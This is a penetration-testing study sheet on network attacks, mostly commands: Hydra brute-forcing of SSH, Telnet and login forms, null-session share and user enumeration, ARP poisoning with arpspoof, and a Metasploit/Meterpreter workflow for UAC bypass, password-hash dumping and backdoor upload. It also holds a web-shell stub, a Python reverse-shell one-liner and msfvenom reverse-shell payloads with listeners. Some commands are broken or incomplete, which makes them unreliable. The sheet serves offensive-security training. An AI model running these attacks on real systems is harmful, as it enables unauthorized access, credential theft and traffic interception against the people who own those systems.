Network Attacks

Authentication Cracking

A similar approach to cracking a password can be used for every service requiring network authentication as: ssh, telnet, remote desktop, HTTP authentication, etc.

Brute Force vs Dictionary Attacks

Performing pure brute force attacks over a network are very impractical because of the time needed to run each probe:

  • Network latency.

  • Delays on the attacked service.

  • Processing time on the attacked server.

  • Network authentication cracking relies almost entirely on dictionary-based attacks, using dictionaries of common and default usernames and passwords


Fast, parallelized, network authentication cracker that supports different protocols: Cisco auth, FTP, HTTP, IMAP, RDP, SMB, SSH, Telnet...

# To get detailed information about a module:
hydra -U rdp

# To launch a dictionary attack against a service:
hydra -L users.txt -P pass.txt <service://server> <options>

# For instance
hydra -L users.txt -P pass.txt telnet://target.server

# Attack session against a password protected web resource
hydra -L users.txt -P pass.txt http-get://localhost/

# Brute-force login form
# => See Module Info
> hydra -U http-post-form
# Our cmd
> hydra http-post-form "/login.php:usr=^USER^&pwd=^PASS^:invalid credentials" -L /usr/share/ncrack/minimal.usr -P /usr/share/sseclist/Passwords/rockyou-15.txt -f -V

# Brute-force SSH
hydra ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-10.txt -f -V

# -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
# -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode

Windows Shares

Ability to:

  • Enumerate network resources.

  • Attack Windows sessions.

  • Obtain unauthorized access to Windows resources.

Windows' filesharing can be exploited via NetBIOS (Network Basic Input Output System):

  • Allows servers and clients to view network shares on a local area network.

  • It can supply some of the following information while querying computers: Hostname, NetBIOS name, Domain, Network shares.

  • NetBIOS sits between the application layer and the IP layer (NetBIOS over TCP/IP).

    • UDP is used to perform name resolution and to carry other one-to-many datagram-based communications (like send small messages to the rest of the other hosts).

    • TCP is used for heavy traffic, as copying files over the network, using NetBIOS sessions.

  • MS Windows browses the network using NetBIOS to:

    • Datagrams to list the shares and the machines.

    • Names to find workgroups.

    • Sessions to transmit data to and from a Windows share.


An authorized user can access shares by using UNC Paths (Universal Naming Connection Paths:

\\ComputerName\C$ # access to a volume (C$, D$, E$)
\\ComputerName\admin$ # points to the windows installation directory
\\ComputerName\ipc$  # used for inter-process communication, cannot be browsed via Explorer

Badly configured shares exploitation can lead to:

  • Information disclosure.

  • Unauthorized file access.

  • Information leakage used to mount a targeted attack.

Null Sessions

Null session attacks can be used to enumerate a lot of information: Passwords, System users, System groups, Running system processes.

  • Remotely exploitable.

  • Nowadays Windows is configured to be immune to this kind of attack.

  • Applicable to legacy systems.

  • Exploits an authentication vulnerability for Windows Administrative Shares, lets an attacker connect to a local or remote share without authentication.

  • Enumerating shares is the first step needed to exploit a Windows machine vulnerable to null sessions.


  • nbstat: windows cmd tool that can display info about the target.

  • nbstat -A <IP>: displays info about a target.

Name                Type      Status
ELS-WINXP     <00>  UNIQUE    Registered
WORKGROUP     <00>  GROUP     Registered
ELS-WINXP     <20>  UNIQUE    Registered
  • ELS-WINXP: name

  • <00>: workstation

  • UNIQUE: this computer must have only one IP address assigned

  • <20>: file sharing service is up and running on the machine

  • Once an attacker knows that a machine has a 'File Server' service running, they can enumerate the shares by using net view:

NET VIEW <target IP>
  • Share enumeration from a Linux Machine is provided by the Samba suite.

  • nmblookup -A <target ip address> gets the same results as NET VIEW <target_IP>.

smbclient also displays shares that are hidden when using Windows standard tools:

# To enumerate the shares provided by a host
smbclient -L //<target_IP> -N

# -L allows to look at what services are available on a target
# -N forces the tool to not ask for a password

Once we have detected that the File and Printer Sharing service is active and we have enumerated the available shares on a target, it's time to check if a null session attack is possible. We can exploit IPC$ administrative share by trying to connect to it without valid credentials.

Checking for Null Sessions with Windows

To connect:

# This tells Windows to connect to the IPC$ share by using an empty password and an empty username!
NET USE \\<target IP address>\IPC$ '' /u:''

smbclient //<target_IP>/IPC$ -N

Exploiting Null Sessions with Enum

enum -S <target>  # -S lets you enumerate the shares of a machine
enum -U <target>  # -U enumerates the users
enum -P <target>  # -P check the password policy
  • Checking password policies before running an authentication attack lets you fin-tune an attack tool to:

    • Prevent accounts locking

    • Prevent false positives

    • Choose your dictionary or your bruteforcer configuration (as knowing the min and max lengh of a password helps to save time)

Exploiting Null Session with Winfo

Automates null session exploitation.

Use with -n to tell the tool to use null sessions

winfo <target_IP> -n

Exploiting Null sessions with Enum4linux

A PERL script that can perform the same operations of enum and winfo, supplying some other features:

  • User enumeration

  • Share enumeration

  • Group and member enumeration

  • Password policy extraction

  • OS info detection

  • A nmblookup run

  • Printer information extraction

# Look for null sessions in the network
nmap -sS -p135,139,445 <IP>

# => enum4linux
# -n
# -P Password policies of the system
# -S shares available in the remote machine
# brute force:
enum4linux -s /usr/share/enum4linux/share-list.txt <IP>
# -a do all simple enumeration

# => samrdump
# It's under : /usr/share/doc/python-impacket-doc/examples
python samrdump <IP>

# => nmap
nmap -script=smb-enum-shares <IP>
nmap -script=smb-brute <IP>

Use samba in Kali:

> vi /etc/samba/smb.conf

# Under [global]
client min protocol = CORE
client max protocol = SMB3
client use spnego = no
client ntlmv2 auth = no

# Get file shares using smbclient
smbclient -L WORKGROUP -I <IP> -N -U ""

# Access to a folder
smbclient \\\\<IP>\\WorkSharing -N
smb: \> ls
smb: \> get flag.txt /home/kali/Desktop/flag.txt

ARP Poisoning

If an attacker finds a way to manipulate the ARP cache, then the attacker will also be able to receive traffic destined to other IP addresses.

  • The attacker can manipulate other hosts' ARP cache tables by sending gratuitous ARP replies.

  • Gratuitous ARP replies = ARP reply messages.

  • The attacker exploits gratuitous ARP messages to tell the victims that they can reach a specific IP address at the attacker's machine MAC address.

  • The operation is performed on every victim.

  • As soon as the ARP cache table contains fake info, every packet of every communication between the poisoned nodes will be sent to the attacker's machine.

  • The attacker can prevent the poisoned entry from expiring by sending gratuitous ARP replies every 30 seconds or so.

  • This kind of attack can be used on an entire network and against a router, letting the attacker intercept the communication between a LAN and the internet.

Dsniff Arpspoof

Collection of tools for network auditing and penetration testing, including arpspoof, designed to intercept traffic on a switched LAN. arpspoof redirects packets from a target host (or all hosts) on the LAN intended for another host on the LAN by forging ARP replies.

Before running the tool, you have to enable the Linux Kernel IP Forwarding, a feature that transforms a Linux box into a router. By enabling IP forwarding, you tell your machine to forward the packets you interecept to the real destination host:

echo 1 > /proc/sys/net/ipv4/ip_forward

# right after you can run arpspoof
arpspoof -i <interface> -t <target> -r <host>
# target and hosts are the victims IP addresses

# => Example
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 -t -r


Metasploit is an open-source framework used for penetration testing and exploit development, giving a wide array of community contributed exploits and attack vectors that can be used against various systems. Extensible.

Basic workflow:

  • Identifying a vulnerable service.

  • Searching for a proper exploit for that service.

  • Loading and configuring the exploit.

  • Loading and configuring the payload you want to use.

  • Running the exploit code and getting access to the vulnerable machine.

A payload is used by an attacker to get:

  • An OS Shell.

  • A VNC or RDP connection.

  • A Meterpreter shell.

  • The execution of an attacker-supplied application.

A special payload, with many useful features under the penetration testing point of view is meterpreter.

$ service postgresql start
$ msfconsole
> help
> show -h
> search <searchterm> # search for a specific module by using the search cmd
> search skeleton
> search turboftp
> show exploits # impractical to use
> use exploit/windows/ftp/turboftp_port # to use exploit for turboftp
> info
> show options
> back
> show payloads
> set payload windows/meterpreter/reverse_tcp
> exploit


Provides advanced features to:

  • Gather information.

  • Transfer files between the attacker and victim machines.

  • Install backdoors and more.

  • meterpreter can both wait for a connection on the target machine or connect back to the attacker machine.

  • A Meterpreter session is an advanced shell on the target machine.

  • Most used configurations are:

    • bind_tcp: runs a server process on the target machine that waits for connections from the attacker machine.

    • reverse_tcp: performs a TCP connection back to the attacker machine (helping to evade firewall rules).

Inside a msfconsole:

> search meterpreter
> set payload windows/meterpreter/reverse_tcp
> exploit
> sessions -l # current opened sessions
> sessions -i 1 # resume session 1
> sysinfo # retrieve info about the exploited machine
> ifconfig # prints the network configuration
> route # routing info
> getuid # which user is running the process exploited
> getsystem # Runs a privilege escalation routine on the target machine

# Bypass UAC (User Account Control policy of modern Windows OSs)
> background # switch from a meterpreter session to the msf console
> search bypassuac
> use exploit/windows/local/bypassuac
> set session 1
> exploit
> getuid

# Dumping the Password Database
> background
> use post/windows/gather/hashdump
> set session 2
> exploit

# Upload / download files
> download HaxLogs.log /root/
> upload /root/backdoor.exe c:\\Windows # note the backslash escaping
> shell

# Is UAC enabled?
run post/windows/gather/win_privs



echo 'ls';


# Python
import os
exit_code = os.system('ls')
output    = os.popen('ls').read()

Simple php shell:

  echo "<form method=GET><input type=text name=cmd><input type=submit value=ok></form>";

Reverse Shell is the most common one we'll use:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'


# msfvenom
# => list payloads for linux
msfvenom --list payloads | grep x64 | grep linux | grep reverse

# => Generate Staged payload
msfvenom -p linux/x64/shell/reverse_tcp lhost=<attacker_IP> lport=443 -f elf -o r443
chmod +x r433

# => Generate Stagelesss payload
> msfvenom --list payloads | grep php | grep reverse
> msfvenom -p php/reverse_php lhost=<attacker_IP> lport=443 -o r443.php

# => Listener staged
$ msfconsole
> use exploit/multi/handler
> set payload linux/x64/shell/reverse_tcp # has to be exactly the same!
> set lhost
> set lport 443
> run # wait for session

# => Listener Stageless
> nc -lvp 4343
# or listen to in MSF with exact payload and the exploit/multi/handler

# Difference between:
#  linux/x64/shell/reverse_tcp
#  linux/x64/shell_reverse_tcp
# Staged: it's smaller. Not enough to create a shell itself. You require to use a msf listener.
# Stageless: it's bigger. It doesn't need anything aditional, just nc in your computer as a listener.

Last updated

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